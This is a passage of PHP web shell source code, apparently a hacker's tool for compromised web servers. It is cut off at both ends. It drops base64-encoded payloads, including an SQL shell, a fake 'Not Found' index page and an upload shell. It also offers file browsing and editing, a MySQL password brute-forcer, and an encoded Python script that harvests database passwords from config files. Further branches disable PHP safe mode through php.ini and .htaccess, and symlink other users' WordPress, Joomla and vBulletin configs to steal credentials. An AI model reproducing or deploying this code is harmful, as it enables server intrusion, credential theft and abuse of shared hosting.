bG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==\'; \r\n$file = fopen("db-sql.php" ,"w+");\r\n$write = fwrite ($file ,base64_decode($sqlshell));\r\nfclose($file);\r\n    chmod("db-sql.php", 0644);\r\n$indexshell = fopen("index.php" ,"w+");\r\n$data = \'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+\';\r\n$tulis = fwrite( $indexshell, base64_decode($data));\r\nfclose($indexshell);\r\n   echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>"; \r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){\r\nif(isset($_POST[\'mail_send\'])){\r\n\t$mail_to = $_POST[\'mail_to\'];\r\n\t$mail_from = $_POST[\'mail_from\'];\r\n\t$mail_subject = $_POST[\'mail_subject\'];\r\n\t$mail_content = magicboom($_POST[\'mail_content\']);\r\n\tif(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){\r\n\t\t$msg = "email sent to $mail_to";\r\n\t}\r\n\telse $msg = "send email failed";\r\n}\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">\r\n<table class="cmdbox">\r\n<tr><td>\r\n<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>\r\n<tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>\r\n<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>\r\n</table>\r\n</form>\r\n\r\n<?php }\r\n\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ \r\n\t@ob_start();\r\n\t@eval("phpinfo();");\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t$awal = strpos($buff,"<body>")+6;\r\n\t$akhir = strpos($buff,"</body>");\r\n\techo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>";\r\n}\r\nelseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){\r\n  if(is_file($_GET[\'view\'])){ \r\n\tif(!isset($file)) $file = magicboom($_GET[\'view\']);\r\n\tif(!$win && $posix){\r\n\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t}\r\n\telse {\r\n\t\t$owner = $user;\r\n\t}\r\n\t$filn = basename($file);\r\n\techo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\">\r\n\t<tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span>\r\n\t<form action=\\"?y=".$pwd."&amp;view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" />\r\n\t</form>\r\n\t</td></tr>\r\n\t<tr><td>Size</td><td>".ukuran($file)."</td></tr>\r\n\t<tr><td>Permission</td><td>".get_perms($file)."</td></tr>\r\n\t<tr><td>Owner</td><td>".$owner."</td></tr>\r\n\t<tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>\r\n\t<tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>\r\n\t<tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>\r\n\t<tr><td>Actions</td><td><a href=\\"?y=$pwd&amp;edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$file\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$file\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$file\\">gzip</a>)</td></tr>\r\n\t<tr><td>View</td><td><a href=\\"?y=".$pwd."&amp;view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=code\\">code</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=image\\">image</a></td></tr>\r\n\t</table>\r\n\t";\r\n\tif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){\r\n\t\techo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&amp;img=".$filn."\\"></div>";\r\n\t}\r\n\telseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){\r\n\t\techo "<div class=\\"viewfile\\">";\r\n\t\t$file = wordwrap(@file_get_contents($file),"240","\\n");\r\n\t\t@highlight_string($file);\r\n\t\techo "</div>";\r\n\t}\r\n\telse {\r\n\t\techo "<div class=\\"viewfile\\">";\r\n\t\techo nl2br(htmlentities((@file_get_contents($file))));\r\n\t\techo "</div>";\r\n\t}\r\n  }\r\n  elseif(is_dir($_GET[\'view\'])){\r\n\t\techo showdir($pwd,$prompt);\r\n  }\r\n\t\r\n}\r\nelseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){\r\n\r\n\t\tif(isset($_POST[\'save\'])){\r\n\t\t\t$file = $_POST[\'saveas\'];\r\n\t\t\t$content = magicboom($_POST[\'content\']);\r\n\t\t\tif($filez = @fopen($file,"w")){\r\n\t\t\t\t$time = date("d-M-Y H:i",time());\r\n\t\t\t\tif(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time;\r\n\t\t\t\telse $msg = "failed to save";\r\n\t\t\t\t@fclose($filez);\r\n\t\t\t}\r\n\t\t\telse $msg = "permission denied";\r\n\t\t}\r\n\t\tif(!isset($file)) $file = $_GET[\'edit\'];\r\n\t\tif($filez = @fopen($file,"r")){\r\n\t\t\t$content = "";\r\n\t\t\twhile(!feof($filez)){\r\n\t\t\t\t$content .= htmlentities(str_replace("\'\'","\'",fgets($filez)));\r\n\t\t\t}\r\n\t\t\t@fclose($filez);\r\n\t\t}\r\n\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">\r\n<table class="cmdbox">\r\n<tr><td colspan="2">\r\n<textarea class="output" name="content">\r\n<?php echo $content; ?>\r\n</textarea>\r\n<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />\r\n&nbsp;<?php echo $msg; ?></td></tr>\r\n</table>\r\n</form>\r\n<?php\r\n}\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'logout\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">\r\n\r\n<?php\r\n    unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]); \r\n    echo \'bye!\'; \r\n}\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'brute\'))\r\n\t\t\t{\t\r\n\t\t\t?>\r\n\t\t\t\t<form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">\r\n\t\t\t<?php\r\n\t\t\t//bruteforce\r\n?>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\r\n<?php\r\n/*\r\nRecoded By X\'1n73ct\r\n*/\r\n@set_time_limit(0);\r\n@error_reporting(0);\r\n\r\n\r\nif($_POST[\'page\']==\'find\')\r\n{\r\nif(isset($_POST[\'usernames\']) && isset($_POST[\'passwords\']))\r\n{\r\n    if($_POST[\'type\'] == \'passwd\'){\r\n        $e = explode("\\n",$_POST[\'usernames\']);\r\n        foreach($e as $value){\r\n        $k = explode(":",$value);\r\n        $username .= $k[\'0\']." ";\r\n        }\r\n    }elseif($_POST[\'type\'] == \'simple\'){\r\n        $username = str_replace("\\n",\' \',$_POST[\'usernames\']);\r\n    }\r\n    $a1 = explode(" ",$username);\r\n    $a2 = explode("\\n",$_POST[\'passwords\']);\r\n    $id2 = count($a2);\r\n    $ok = 0;\r\n    foreach($a1 as $user )\r\n    {\r\n        if($user !== \'\')\r\n        {\r\n        $user=trim($user);\r\n         for($i=0;$i<=$id2;$i++)\r\n         {\r\n            $pass = trim($a2[$i]);\r\n            if(@mysql_connect(\'localhost\',$user,$pass))\r\n            {\r\n                echo "X\'1n73ct~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";\r\n                $ok++;\r\n            }\r\n         }\r\n        }\r\n    }\r\n    echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by x\'1n73ct</b>";\r\n    echo "<center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\n    exit;\r\n}\r\n}\r\nif($_POST[\'pass\']==\'password\'){\r\n@error_reporting(0);\r\n$i = getenv(\'REMOTE_ADDR\');\r\n$d = date(\'D, M jS, Y H:i\',time());\r\n$h = $_SERVER[\'HTTP_HOST\'];\r\n$dir=$_SERVER[\'PHP_SELF\'];\r\n$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";\r\n$file = fopen(".php","w+");\r\n$write = fwrite ($file ,base64_decode($back));\r\nfclose($file);\r\nchmod(".php",0755);\r\nmkdir(\'config\',0755);\r\n$cp =\r\n\'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=\';\r\n$file = fopen("cp.py","w+");\r\n$write = fwrite ($file ,base64_decode($cp));\r\nfclose($file);\r\nchmod("cp.py",0755);\r\n$url = $_POST[\'url\'];\r\necho"<center>\r\n<textarea cols=\\"90\\" rows=\\"20\\" name=\\"usernames\\">";\r\nsystem("python cp.py $url config");\r\nunlink (\'cp.py\');\r\necho"</textarea>\r\n</center>";\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\nif($_POST[\'matikan\']==\'sekatan\'){\r\n@error_reporting(0);\r\n$phpini =\r\n\'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==\';\r\n$file = fopen("php.ini","w+");\r\n$write = fwrite ($file ,base64_decode($phpini));\r\nfclose($file);\r\n$htaccess =\r\n\'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==\';\r\n$file = fopen(".htaccess","w+");\r\n$write = fwrite ($file ,base64_decode($htaccess));\r\necho "<hr><center><b>DONE!";\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\nif($_POST[\'mendapatkan\']==\'passwd\'){\r\n@set_magic_quotes_runtime(0);\r\nob_start();\r\nerror_reporting(0);\r\n@set_time_limit(0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0);\r\n$fn = $_POST[\'foldername\'];\r\n//all function here\r\n\r\nfunction syml($usern,$pdomain)\r\n\t{\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home/\'.